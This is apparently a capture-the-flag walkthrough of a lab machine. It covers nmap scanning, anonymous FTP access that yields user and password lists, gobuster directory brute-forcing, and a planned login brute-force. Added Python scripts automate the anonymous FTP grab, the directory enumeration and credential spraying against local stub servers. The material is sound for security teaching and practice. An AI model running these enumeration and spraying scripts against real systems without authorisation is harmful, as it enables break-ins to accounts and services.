Start with an nmap scan. There are two ways to go about it.

┌──(spencer㉿kali)-[~/桌面]
└─$ sudo nmap -sC 10.129.237.84 -Pn -n --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 17:25 CST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 84.81% done; ETC: 17:25 (0:00:00 remaining)
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.76% done; ETC: 17:26 (0:00:01 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.58% done; ETC: 17:26 (0:00:00 remaining)
Nmap scan report for 10.129.237.84
Host is up (0.48s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.71
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http
|_http-title: Smash - Bootstrap Business Template

Nmap done: 1 IP address (1 host up) scanned in 22.06 seconds

This directly reveals the service details (the ftp-syst script prints the vsFTPd 3.0.3 banner) and what the current user, i.e. anonymous, is allowed to do. Note that -sC only runs the default NSE scripts against the top 1000 TCP ports; add -sV for real version detection and -p- to cover every port.

Alternatively, use a quick port scan first:

sudo nmap -sS -Pn -n --open 10.129.237.84

A SYN scan with host discovery (-Pn) and DNS resolution (-n) disabled lists the open ports quickly; run -sC/-sV afterwards against just the ports it finds.

ftp-anon: Anonymous FTP login allowed (FTP code 230)

This line means anonymous login is allowed: the server has a built-in account named anonymous that accepts any password (by convention an e-mail address).

Let's log in with it.


Login succeeded.

Let's look at the commands available:

ftp> help
Commands may be abbreviated. Commands are:

! cdup epsv4 hash mdelete mput pdir quote rmdir struct user
$ chmod epsv6 help mdir mreget pls rate rstatus sunique verbose
account close exit idle mget msend pmlsd rcvbuf runique system xferbuf
append cr features image mkdir newer preserve recv send tenex ?
ascii debug fget lcd mls nlist progress reget sendport throttle
bell delete form less mlsd nmap prompt remopts set trace
binary dir ftp lpage mlst ntrans proxy rename site type
bye disconnect gate lpwd mode open put reset size umask
case edit get ls modtime page pwd restart sndbuf unset
cd epsv glob macdef more passive quit rhelp status usage

We use the dir command to list the directory and get to download the files:

ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||41292|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |*****************************************************************************************************************************************| 33 0.12 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:01 (0.03 KiB/s)

We have the first file.

ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||45746|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |*****************************************************************************************************************************************| 62 0.23 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:01 (0.05 KiB/s)

That gives us both files: judging by the names, a list of permitted usernames and the matching passwords.

Open the userlist file to see the usernames, then try logging into FTP with one of them.

The attempt fails:

┌──(spencer㉿kali)-[~/桌面]
└─$ ftp 10.129.237.84
Connected to 10.129.237.84.
220 (vsFTPd 3.0.3)
Name (10.129.237.84:spencer): aron
530 This FTP server is anonymous only.
ftp: Login failed
ftp>

The reply 530 This FTP server is anonymous only. means named accounts cannot log into FTP at all, so these credentials must belong to something else and we need another way in.

In the earlier scan results we also saw an HTTP service on port 80, served by Apache. The Wappalyzer browser extension shows what technologies the site is built with.

Quoting an earlier article: a different, more direct way to reach hidden or hard-to-find directories and pages is directory brute-forcing. With gobuster as the tool of choice, the following switches give the fastest and most accurate results.
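The anonymous login above and the 530 rejection of a named user, as an added example that is not part of the original post: a stub FTP server that answers the same way as the target runs in-process, so the probe can be exercised offline. The share contents, the anon@ password and the port are constructed; against a real host you would point try_login and grab_anonymous at its IP and port 21.

```python
import ftplib, io, socket, threading

# Constructed share: file names copied from the scan listing above, contents made up.
SHARE = {
    "allowed.userlist": b"user1\nuser2\nuser3\n",
    "allowed.userlist.passwd": b"password1\npassword2\npassword3\n",
}

def _reply(conn, line):
    conn.sendall((line + "\r\n").encode())

def _serve_control(conn):
    """One control connection of a minimal anonymous-only, passive-mode FTP server."""
    rd = conn.makefile("rb")
    data_listener, anon_user, authed = None, False, False
    _reply(conn, "220 (stub FTP)")
    while True:
        raw = rd.readline()
        if not raw:
            break
        cmd, _, arg = raw.decode(errors="replace").rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            anon_user = arg.lower() == "anonymous"
            # same reply the target gave for a named account
            _reply(conn, "331 Please specify the password." if anon_user
                   else "530 This FTP server is anonymous only.")
        elif cmd == "PASS":
            authed = anon_user            # any password is accepted for anonymous
            _reply(conn, "230 Login successful." if authed else "530 Login incorrect.")
        elif cmd == "QUIT":
            _reply(conn, "221 Goodbye.")
            break
        elif not authed:
            _reply(conn, "530 Please login with USER and PASS.")
        elif cmd == "TYPE":
            _reply(conn, "200 Switching mode.")
        elif cmd == "PASV":
            data_listener = socket.socket()
            data_listener.bind(("127.0.0.1", 0))
            data_listener.listen(1)
            port = data_listener.getsockname()[1]
            _reply(conn, f"227 Entering Passive Mode (127,0,0,1,{port >> 8},{port & 0xFF}).")
        elif cmd in ("NLST", "RETR") and data_listener is not None:
            if cmd == "RETR" and arg not in SHARE:
                _reply(conn, "550 Failed to open file.")
                continue
            payload = b"".join(n.encode() + b"\r\n" for n in SHARE) if cmd == "NLST" else SHARE[arg]
            _reply(conn, f"150 Opening BINARY mode data connection ({len(payload)} bytes).")
            data, _ = data_listener.accept()   # client connected right after the 227 reply
            data.sendall(payload)
            data.close()
            data_listener.close()
            data_listener = None
            _reply(conn, "226 Transfer complete.")
        else:
            _reply(conn, "502 Command not implemented.")
    conn.close()

def start_stub_ftp():
    """Start the stub on an ephemeral 127.0.0.1 port; returns (listening socket, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:               # listener closed by the caller
                return
            threading.Thread(target=_serve_control, args=(conn,), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]

def try_login(host, port, user, password="anon@"):
    """Return the server's reply to a login: '230 ...' on success, '530 ...' when rejected."""
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=5)
        try:
            return ftp.login(user, password)
        except ftplib.error_perm as err:
            return str(err)

def grab_anonymous(host, port):
    """Log in as anonymous, list the root and download every file; returns {name: bytes}."""
    files = {}
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=5)
        ftp.login("anonymous", "anon@")
        for name in ftp.nlst():
            buf = io.BytesIO()
            ftp.retrbinary("RETR " + name, buf.write)
            files[name] = buf.getvalue()
    return files
```

try_login returns the raw reply line, so the 331/230 versus 530 distinction is visible exactly as it was in the interactive session; grab_anonymous is the scripted equivalent of dir followed by get for every entry.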

dir : Uses directory/file enumeration mode.
--url : The target URL.
--wordlist : Path to the wordlist.
-x : File extension(s) to search for.

For -x, we specify php and html: gobuster then also requests word.php and word.html for every wordlist entry, so we only get the file types we care about and skip the rest of the noise.

This tool works well, as the run below shows.

┌──(spencer㉿kali)-[~/桌面]
└─$ gobuster dir --url http://10.129.237.84/ --wordlist directory/directory-list-2.3-small.txt -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.237.84/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2022/06/14 17:58:12 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 58565]
/login.php (Status: 200) [Size: 1577]
/assets (Status: 301) [Size: 315] [--> http://10.129.237.84/assets/]
/css (Status: 301) [Size: 312] [--> http://10.129.237.84/css/]
/js (Status: 301) [Size: 311] [--> http://10.129.237.84/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/config.php (Status: 200) [Size: 0]
/fonts (Status: 301) [Size: 314] [--> http://10.129.237.84/fonts/]
/dashboard (Status: 301) [Size: 318] [--> http://10.129.237.84/dashboard/]
Progress: 13095 / 262995 (4.98%) ^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2022/06/14 18:11:54 Finished
===============================================================

The scan output is fairly detailed. Note that /config.php answers 200 with Size 0: it exists and is executed server-side but prints nothing, so it cannot be read directly. The interesting finds are /login.php and /dashboard/.

We now have a login form and, from FTP, a list of usernames and a list of passwords. Open /login.php and brute-force it by trying each username/password combination from those two files.
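The two web steps above (gobuster-style directory brute-forcing with -x extensions and a negative status code, then trying the recovered user and password lists against login.php), as one added example that is neither the post's nor gobuster's own code. It serves a constructed stub site in-process that mirrors the hits from the scan; the form field names username/password, the accepted credential pair and the redirect-to-dashboard success signal are assumptions about the stub, not facts about the target. Against a real site you would pass its URL as base_url and feed the lines of allowed.userlist and allowed.userlist.passwd to spray_login.

```python
import http.server
import threading
import urllib.error
import urllib.parse
import urllib.request

# Constructed stub site mirroring the gobuster hits above: path -> (status, body, Location).
SITE = {
    "/index.html": (200, b"<html>Smash - Bootstrap Business Template</html>", None),
    "/login.php": (200, b"<form method=post>", None),
    "/config.php": (200, b"", None),          # exists, but prints nothing (Size: 0)
    "/logout.php": (302, b"", "login.php"),
    "/dashboard": (301, b"", "/dashboard/"),
}
# Hypothetical credentials and form field names the stub accepts; not the target's real ones.
VALID_LOGIN = ("user2", "password3")

class StubHandler(http.server.BaseHTTPRequestHandler):
    def _send(self, status, body, location=None):
        self.send_response(status)
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._send(*SITE.get(self.path, (404, b"Not Found", None)))

    def do_POST(self):
        # login.php: redirect to the dashboard on success, re-render the form otherwise
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        if self.path == "/login.php" and creds == VALID_LOGIN:
            self._send(302, b"", "/dashboard/")
        else:
            self._send(200, b"<form method=post>Incorrect username or password</form>")

    def log_message(self, *args):       # keep the stub quiet
        pass

def start_stub_site():
    """Serve the stub on an ephemeral 127.0.0.1 port; returns (server, port)."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), StubHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 301/302 as findings instead of following them, as gobuster does."""
    def redirect_request(self, *args):
        return None

_OPENER = urllib.request.build_opener(_NoRedirect())

def _fetch(url, data=None):
    """Return (status, body size, Location header) for one request, redirects not followed."""
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "dirbust-example/0.1"})
    try:
        with _OPENER.open(req, timeout=5) as resp:
            return resp.status, len(resp.read()), None
    except urllib.error.HTTPError as err:    # 3xx/4xx/5xx all land here
        return err.code, len(err.read()), err.headers.get("Location")

def dir_bust(base_url, words, extensions=("php", "html"), negative_codes=(404,)):
    """gobuster dir -x style: request word and word.ext for every word, drop negative statuses."""
    hits = []
    for word in words:
        for cand in [word] + [f"{word}.{ext}" for ext in extensions]:
            status, size, loc = _fetch(f"{base_url}/{cand}")
            if status not in negative_codes:
                hits.append((f"/{cand}", status, size, loc))
    return hits

def spray_login(base_url, users, passwords):
    """POST every user/password pair to login.php; a redirect to the dashboard marks success."""
    for user in users:
        for pw in passwords:
            body = urllib.parse.urlencode({"username": user, "password": pw}).encode()
            status, _, loc = _fetch(f"{base_url}/login.php", data=body)
            if status == 302 and loc and "dashboard" in loc:
                return user, pw
    return None

if __name__ == "__main__":
    server, port = start_stub_site()
    base = f"http://127.0.0.1:{port}"
    for hit in dir_bust(base, ["index", "login", "config", "logout", "dashboard"]):
        print(hit)
    print(spray_login(base, ["user1", "user2"], ["password1", "password3"]))
    server.shutdown()
```

Two design points carried over from gobuster: redirects are reported rather than followed, because a 301 on a bare name is how directories like /dashboard reveal themselves, and only the negative status (404) is discarded, so a 200 with an empty body such as /config.php is still listed. For a real login form, confirm what a successful response looks like (a redirect, a Set-Cookie, a changed body length) before keying the sprayer on it.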